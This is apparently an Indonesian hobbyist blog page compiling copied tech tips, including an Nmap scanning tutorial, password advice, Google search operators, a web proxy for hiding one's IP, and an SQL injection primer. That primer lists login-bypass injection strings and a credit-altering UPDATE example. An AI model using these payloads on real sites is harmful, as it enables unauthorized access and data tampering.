OS 'Sembarang Tempat' Puppy Linux 3.0 (Tampa harus menginstal)

Kabar baik buat kita yang ingin kenal dan belajar Linux namun malas jika harus meng-install sistem operasi (OS) ke hardisk mungkin kita sekarang kita bisa mencoba Puppy Linux.

OS ini mampu dijalankan langsung dari CD dan USB tanpa harus mengkopi ke hardisk. Dengan kata lain, OS ini bisa disebut sebagai sistem operasi 'sembarang tempat'. Kini, versi terbarunya pun siap meluncur.

Keunikan inilah yang membuat Puppy Linux berbeda dari OS lainnya. Puppy Linux 3.0 -- juga masih menyedot ukuran yang cukup mungil, tak sampai 100 Mb.Puppy juga bisa digunakan dalam berbagai komputer lama, sarana demo pengenalan Linux ataupun sebagai sistem operasi darurat.

Meski mungil, Puppy diklaim punya desain yang handal, mudah digunakan serta berfitur optimal. Aplikasi bawaan yang disertakan pun cukup banyak termasuk Sea Monkey/Mozilla Application Suite, AbiWord, Sodipodi ataupun Gnumeric.

Menurut pengembangnya, Barry Kauler, Puppy Linux 3.0 telah mengalami upgrade cukup banyak dari versi sebelumnya. Salah satunya terkait kompabilitas Puppy Linux dengan distro Linux lawas, Slackware.

Silakkan baca selengkapnya di www.detiknet.com.....!

Tips Mengintip Host dengan Tools NMAP

Nmap yang merupakan singkatan dari Network Mapper merupakan tools para hacker yang digunakan untuk melakukan pemetaan suatu jaringan. Dengan Nmap dapat diketahui, komputer atau host mana yang aktif dan kira-kira dapat di eksploitasi lebih lanjut.
Sebelum memulai, sebaiknya Anda perlu mengetahui fasilitas apa yang tersedia dari Nmap. Untuk itu Anda dapat memulai dengan melihat option yang tersedia. Untuk mengetahui option yang tersedia dari Nmap, cukup memanggil Helpnya sebagai berikut:
C:\>nmap –h

Nmap tersedia di berbagai sistem operasi mulai dari Unix, Linux hingga Windows. Anda dapat mendownload di http://www.nmap.org atau http://www.insecure.org/nmap. Pada tulisan ini mempergunakan Nmap dengan sistem operasi Windows. Namun demikian kami tidak menggunakan versi grafis melainkan versi text atau command line, sehingga instruksi atau command line yang sama dapat Anda lakukan pada sistem operasi lainnya seperti Linux, Unix dan keluarganya.
Cara yang paling sederhana untuk mengetahui apakah sebuah komputer atau host aktif atau tidak aktif adalah dengan menggunakan perintah ping sebagai berikut:
C:\>ping server1
Pinging server1 [128.1.10.25] with 32 bytes of data:
Reply from 128.1.10.25: bytes=32 time<10ms ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" bytes="32" ttl="128" sent =" 4," received =" 4," lost =" 0" minimum =" 0ms," maximum =" 0ms," average =" 0ms">ping 192.168.1.95
Pinging 192.168.1.95 with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 192.168.1.95:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
C:\>

Misalnya Anda ingin memeriksa apakah ada host yang aktif pada network kelas C dengan nomor IP 192.168.1.1 s/d 192.168.1.10 Maka Anda dapat memeriksa dengan perintah sebagai berikut:
C:\> nmap -sP 192.168.1.91-100

Penggunaan option –O diperuntukan untuk mendeteksi jenis sistem operasi, sebagai berikut:
C:\> nmap -O ristbook

Diatas telah diperkenalkan beberapa option dari Nmap yang merupakan teknik scan. Berikut ini teknik scan lanjutan yang dapat Anda manfaatkan sesuai dengan medan tempur yang ada:
a. TCP connect scan -sT
Jenis scan ini terhubung ke port host target dan menyelesaikan three-way handshake (SYN, SYN/ACK
dan ACK) Scan ini mudah terdeteksi oleh pengelola host target.
b. TCP SYN Scan -sS
Teknik ini dikenal sebagai half-opening scanning karena suatu koneksi penuh tidak sampai terbentuk.Teknik ini bersifat siluman dibandingkan dengan TCP koneksi penuh dan tidak akan tercatat pada log host target.
c. TCP FIN scan –sF
Teknik ini mengirimkan suatu paket FIN ke port host target. Berdasarkan RFC 793, host target akan mengirim balik suatu RST untuk setiap port yang tertutup. Teknik ini hanya dapat dipakai pada stack TCP/IP berbasis Unix.
d. TCP Xmas tree scan -sX
Teknik ini mengirimkan suatu paket FIN, URG dan PUSH ke port host target. Berdasarkan RFC 793, host target akan mengembalikan suatu RST untuk semua port yang tertutup.
e. TCP Null scan -sN
Teknik ini membuat off semua flag. Berdasarkan RFC 793, host target akan mengirim balik suatu RST untuk semua port yang tertutup.
f. TCP ACK scan -sA
Teknik ini digunakan untuk memetakan set aturan firewall. Hal ini sangat membantu Anda dalam menentukan apakah firewall yang dipergunakan adalah simple packet filter yang membolehkan hanya koneksi penuh saja (koneksi dengan bit set ACK) atau suatu firewall yang menjalankan advance packet filtering.
g. TCP Windows scan -sW
Teknik ini dapat mendeteksi port-port terbuka maupun terfilter/tidak terfilter pada sistem-sistem tertentu seperti pada AIX dan Free BSD sehubungan dengan anomali dari ukuran windows TCPnya.
h. TCP RPC Scan -sR
Teknik ini spesifik hanya pada sistem Unix dan digunakan untuk mendeteksi dan mengidentifikasi port RPC dan program serta nomor versi yang berhubungan dengannya
i. UDP Scan -sU
Teknik ini mengirimkan suatu paket UDP ke port host target. Bila port host target memberikan response pesan berupa “ICMP port unreachable” artinya port ini tertutup. Sebaliknya bila tidak menerima pesan tersebut, Anda dapat menyimpulkan bahwa port tersebut terbuka. Karena UDP dikenal sebagai connectionless protocol, maka akurasi teknik ini sangat bergantung pada banyak hal sehubungan dengan penggunaan jaringan dan sistem reources lainnya.
Apapun teknik port scan yang akan Anda pergunakan, Anda perlu berhati-hati dalam menggunakan terhadap host target. Tindakan Anda melakukan port scanning ke host target yang bukan wewenang Anda dapat saja menimbulkan reaksi yang mungkin tidak Anda duga sebelumnya dari pengelola host target seperti serangan balik, pemblokiran terhadap acount oleh ISP dan sebagainya. Jadi sebaiknya Anda menguji coba pada sistem Anda sendiri.

Dikutip dari:
Denny Yerianto, IlmuKomputer.Com

Tips Menyembunyikan Drive di PC

Artikel ini dikutip penulis dari tabloid PCMILD, mungkin aja ada yang belum tau atau sekedar ngingetin lagi bagi yang udah tau caranya. Sebenernya ga ada persipan khusus buat ngilangin drive di PC km, cuma ngerubah registry aja kok, berarti yang kamu butuhkan just only PC yang pake OS Win XP (all SP) n Win ME, (kalo di 98 blm dicoba). itu aja......
Nah skr ikutin langkah2 nya:

  1. Klik tombol START trus lo pilih RUN di jendela RUN tadi itu lo ketik "Regedit" (gak pake tanda kutip)
  2. Nah skr lo dah di jendela Registry Editor, trus cari HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
  3. Buka folder EXPLORER tadi, trus klik kanan di area kosong di panel bagian kanan, klik NEW trus klik DWORD Value, trus beri nama NoDrives
  4. klik ganda NoDrives tadi, trus ubah angka di value data nya sesuai dgn drive mana yg mau lo ilangin, ni angka bwt ngilangin drive nya:
Drive A = 1 Drive H = 128 Ngilangin semua drive = 67108863
Drive B = 2 Drive I = 256
Drive C = 4 Drive J = 512
Drive D = 8 Drive K = 1024
Drive E = 16 Drive L = 2048
Drive F = 32 Drive M = 4096
Drive G = 64 Drive N = 8192

5. Kalo udah, close registry editornya trus restart PC nya...!!
6. kalo udah lo restart buka My Computer trus liat, ga ada kan drive yang dah lo ilangin tadi....
7. tenang aja semua data yang ada di drive tadi aman kok.....!!!!

CARA NGEMBALIIN KE SEPERTI SEMULA:
  1. ikuti langkah diatas (no 1 ampe no 2) yach!!!!!
  2. Buka folder EXPLORER nya, trus cari NoDrives nya
  3. Nah di jendela NoDrives, rubah Value Data yang tadinya 4 (misal: untuk drive C) atau angka drive yang dah lo masukin, trus ganti jadi 0 (nol), atau hapus aja langsung nama file NoDrives tadi
  4. Restart tuch PC, and than liat aja di my computer drive yang diilangin tadi pasti udah ada......
Dikutip dari:
Oleh Jackie Chan
www.jasakom.com

TCH Happy Browser

HAPPY BROWSER BETA V.0.9.1(HB) adalah sebuah tools yang dikembangkan untuk security tool di platform windows pada tahun 1999 dengan versi tester. Happy Browser bisa dengan mudah dipakai oleh setiap orang yang ingin memeriksa vulnerebillitas pada NT-server/webserver, tools ini dapat digunakan secara mudah dan sederhana, belakangan juga tools ini bisa dimafaatkan untuk melakukan scanning web untuk mencari kelemahan web itu dengan mengintip security hole-nya.

Pada bagian address kita tinggal masukan web yang akan di scan kemudian enter, maka dproses scan dilakukan, dan hasil scan dapat dilihat pada window scanned. Datail situsnya akan tampil pada jendela results, dengan tools ini kita bisa mengecek server dan port apa saja yang terbuka, apabila barwarna merah artinya port tertutup dan jika ada port yang terbuka ditandai dengan logo warna kuning

Bagaimana password yang baik

Terkadang kita menyepelekan pembuatan password, padahal password adalah sebuah sandi yang sangat penting untuk keaman dan privasi kita. Sering kali orang membuat password sangat sederhana yang penting mudah diingat dan gampang penulisannya, misalnya nama pacar, nama anak, tanggal lahir, 1234, kata “password”, dll.
Seorang maling bisanya akan mempelajari kebiasaan korbannya, misalnya calon korban biasa meletakan kunci rumah di bawah keset di depan pintu,di rak sepatu atau di pot bunga, hal tersebut akan sangat memudahkan seorang maling yang ingin masuk rumah kita karena tempat panyimpanan yag udah biasa atau dalam istilah kita dalam kontek komputer di sebut “dafault”. Maka dengan mudah si cracker yang sudah mengenali kebiasaan kita akan menebak password calon korbannya misalnya :

1.nama belakang user
2.nama user
3.nama Tuhan-nya
4.nama istri
5.tempat lahir
6.tgl lahir
7.kode pos
8.kota tinggal
9.nama pacar,
10.atau hal-hal lain yang berhubungan dengan user
Dan beberapa hal yang berhubungan dengan user di sini misalnya password:
1.password
2.admin
3.administrator
4.user
5.root
6.dll

Ciri password buruk :
1.Terdiri 7 karakter atau kurang
2.Terdiri dari satu suku kata: cinta, love, peace, sandi, masuk, dll
3.Tidak terdiri dari kombinasi anggka dan karakter lain
4.Kombinasi karakter tapi memiliki arti : adm1n, h4ck3r,cr4c3r, dll

Barikut ini contoh password yang buruk :
12345
abc123
password
computer
28081986----------->tangal lahir(tgl,bln,thn)
123456
aaa
abc
academia
academic
access
root
ada
admin
administrator
adrian
adrianna
aerobics
cinta
love
damai
yesus
my jesus
my love
dst..

Contoh password yang baik :
1.Harus lebih dari 7 karakter
2.Terdiri 2 suku kata yang berbeda
3.Tidak memiliki arti
4.Terdiri dari campuran anggka, huruf, dan karakter lain
5.Jangan catat password anda di HP atau kertas (di ingat saja)
6.Bila mendapat password default segera di ganti
contoh:
1xxxbe_**
#78bgtg2
00(0kahan_2427hb]
,”kha*pakkd234
dll..


Trik mencari artikel dengan google

Kita tentu sudah pernah/sering mencari artikel-artikel untuk tugas-tugas kuliah dan untuk referensi lainnya dengan batuan mensin pencari google, tapi kadang kita mengami kesulitan mencari artikel yang kita inginkan karena hasil yang diberikan google yang tidak sesuai dengan apa yang diharapkan, hal ini dikarenakan pencarian yang tidak dibatasi sehingga google menampilkan semua kata yang mengandung kata kunci yang kita masukan.
Maka untuk membatasinya kita bisa menggunakan sintak google yang ada, seperti yang artikel sebelumnya yang pernah saya di post pada blog ini mengenai sintax google

1.Ketikan filetype: pada searce google, misalnya : filetype:doc matematika biner, maka yang akan ditampilkan adalah seluruh file yang bertipe doc = dokumen/biasanya msword yang mengandung kata matematika biner
2.Tentukan site-nya dengan menambahkan kata kunci site: misalnya filetype:doc matematika biner site:ac.id , maka google akan membatasi lagi pancarian hanya pada situs dengan domain ac.id. adalah domain untuk situs pendidikan
3.selain contoh di atas kita bisa mengkreasikan sendiri cara-cara penulisan pancarian ini dengan sitax google
ket:
doc = document/msword
exl = excel
ppt = p.point
pdf = pdf file
txt = text file/notepad
mdb = database/acces/sql,dll
etc…

Filetype:
filetype:doc
filetype:pdf
filetype:exl
filetype:ppt
filetype:txt
filetype:mdb
etc…

site:info
site:org
site:com
site:ac.id
site:net
site:tv
site:or.id
etc…

4. Kita juga bisa menggunakan kata kunci related, ini berguna untuk memberi daftar web page yang serupa dengan situs yang kita arahkan, misalnya :
related:www.ilmukomputer.com, maka google akan menampilkan situs-situs yang serupa dengan www.ilmukomputer.com
5.Apabila kita ingin menampilkan judul yang tepat dengan kata kunci yang kita masukan kita bisa menggunakan Intitle: ini adalah sintax untuk membatasi pencarian yang hanya menghasilkan judul yang mengandung informasi pada topik yang dimaksud, misalnya :
Intitle: matematika biner, Maka yang akan ditampilkan adalah data-data dengan judul matematika biner
Setiap sitax-sintax ini bisa kita gabungkan dan dikreasi sendiri menurut kebutuhan kita untuk membatasi pencarian artikelnya, ex:
filetype:pdf Intitle:matematika biner site:com

SQL Injection

Keuntungan yg diambil dari trik ini adalah seperti login akses terhadap server yg bukan haknya atau yg lainnya, tergantung kepada penyerangnya.
Default setting dari SQL adalah :

adminID = sa
password ='' (kosong atau blank)

misalnya : http://www.target.com/login.asp?adminID=sa%20password=''%20 artinya menggantikan "jarak spasi" Ini merupakan kondisi yg berbahaya jika pengubahan setting tidak segera dilakukan.

Verifikasi yg dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yg terlihat pada teks sebagai berikut :

SQLQuery="SELECT Username FROM Users WHERE Username="'&strUsername&"'strpassword&"'

Contoh : menggunakan injection string 'OR''= pada username maupun password baik dilakukan dgn metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut :

SELECT Username FROM Users WHERE Username=''OR''='' AND Password=''OR''=''

Maka yg terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yg sah (valid). SQL Injection yg berhasil dilakukan akan ditandai dgn munculnya error page dgn error yg dimunculkan dapat berupa ODBC error, internal server error, syntax error dan lain sebagainya.

Ada banyak variasi dari injection string yg dapat digunakan untuk melakukan SQL Injection :
'or 1=1--
'or 0=0 --
'or 'x'='x
'or a=a-
"or 0=0 --
"or 0=0 #
"or "x"="x
")or("a"="a
admin'--
hi" or 1=1 --
hi' or'a'='a
hi")or("a"="a
or 0=0 #
'or a=a--
'or 0=0 #
'having 1=1--
"or 1=1--
"or "a"="a
')or('a'='a
')or('x'='x
hi" or "a"="a
hi' or 1=1 --
hi')or('a'='a
or 0=0 --
or 1=1--

Serangan dgn menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yg dilakukan oleh penyerang. Contoh :

'UPDATE YEPCell_memberDB set Credits=100 wher UserID='yamakasi'

SQl Injection yg dilakukan seseorg dapat dideteksi dgn menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yg terlalu asing terdengar ditelinga anda. Anda dapat mencarinya di www.google.com

from : http://jambihackerlink.tk/
Judul asli : Konsep dasar SQL Injection

Mengalihkan IP address saat browsing

Setiap kali kita brows pada suatu web tertentu maka IP addres kompi kita akan selalu tercatat oleh server atau admin tertentu, misalnya 202.65.3118.67. nomor-nomor ini menunjukan posisi, lokasi bahkan indentitas server kita saat brows.
Artinya kita sedang atau dapat dipantau oleh server web yang kita kunjungi...berikut adalah salah satu web yang dapat kita gunakan agar IP kita dapat dilencengkan adalah dengan http://www.anonymouse.org,Cara penggunaannya adalah:
  1. kunjungi http://www.anonymouse.org
  2. sekarang tinggal menambahkan alamat website yang akan dikunjungi misalnya http://anonymouse.org/cgi-bin/anon-www.cgi/[url target]
  3. contoh ketika anda mengunjungi nyon-nyos.blogspot.com dengan web proxyhttp://anonymouse.org/cgi-bin/anon-www.cgi/www.nyon-nyos.blogspot.com
Lihat IP anda sekarang maka akan berubah dengan IP lain..namun kelemahan cara ini adalah untuk load akan memakan waktu yang lama


Dikutip dari: o-om.blogspot.com